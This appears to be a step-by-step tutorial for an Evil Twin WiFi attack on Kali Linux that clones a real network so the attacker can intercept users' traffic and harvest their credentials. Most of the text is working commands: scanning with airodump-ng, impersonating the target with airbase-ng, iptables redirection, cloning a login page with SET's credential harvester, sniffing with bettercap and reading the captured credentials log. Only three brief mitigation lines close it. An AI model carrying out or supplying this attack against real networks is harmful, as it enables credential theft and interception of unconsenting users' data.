Evil Twin Access Point Attack: 
------------------------------

A. Objective:
-------------
1. The goal of this project is to create a rogue WiFi access point (Evil Twin) that mimics a legitimate WiFi network. 
2. Once users connect, the attacker can intercept their data, redirect them to phishing pages, or perform a Man-in-the-Middle (MITM) attack to steal credentials.

B. Implementation Steps:
------------------------
Step 1: Set Up Kali Linux in VirtualBox
---------------------------------------
Ensure your Kali Linux VM is running in VirtualBox and has a compatible external WiFi adapter that supports monitor mode and packet injection (e.g., ALFA AWUS036NHA).

Step 2: Enable Monitor Mode
---------------------------
Open a terminal in Kali and check your WiFi interfaces:
$ ifconfig wlan0 down
$ iwconfig wlan0 mode monitor
$ ifconfig wlan0 up

Or using Airmon-ng:
$ airmon-ng start wlan0

Step 3: Scan for Target WiFi Networks
-------------------------------------
Find the target network you want to clone:
$ airodump-ng wlan0mon
Note down the SSID, BSSID, and Channel of the target WiFi.

Step 4: Create the Fake AP (Evil Twin)
--------------------------------------
Use airbase-ng to create an Evil Twin AP:
$ airbase-ng -a [Target BSSID] --essid "[Target SSID]" -c [Channel] wlan0mon

This creates a fake access point that looks exactly like the target WiFi.

Step 5: Assign IP Address and Enable Internet Sharing
-----------------------------------------------------
Open another terminal and configure the network:
$ ifconfig at0 up
$ ifconfig at0 192.168.1.1 netmask 255.255.255.0
$ route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
$ echo 1 > /proc/sys/net/ipv4/ip_forward

Set up iptables to enable NAT and redirect traffic:
$ iptables --table nat -A POSTROUTING -o eth0 -j MASQUERADE
$ iptables -A FORWARD -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
$ iptables -A FORWARD -i at0 -o eth0 -j ACCEPT

Start a DHCP server:
$ dnsmasq -C /etc/dnsmasq.conf -d

Step 6: Capture Login Credentials (Phishing Page)
-------------------------------------------------
Set up a phishing page to capture credentials:

Use SET (Social Engineering Toolkit) to clone a login page:
$ setoolkit
	Select Social Engineering Attacks > Website Attack Vectors > Credential Harvester Attack Method. Clone a real WiFi login portal.

Redirect users using iptables:
$ iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080

Step 7: Launch a Man-in-the-Middle (MITM) Attack
------------------------------------------------
Use ettercap or bettercap to sniff traffic:
$ bettercap -iface at0

Or capture packets with Wireshark:
$ wireshark

Step 8: Analyze Captured Data
-----------------------------
Check intercepted credentials in the logs. Example path for SET:

$ cat /var/www/html/log.txt


C. Defence and Mitigation:
--------------------------
1. Use WPA3 or Enterprise WiFi with RADIUS authentication.
2. Enable AP Isolation and MAC filtering.
3. Educate users to avoid connecting to unknown open networks.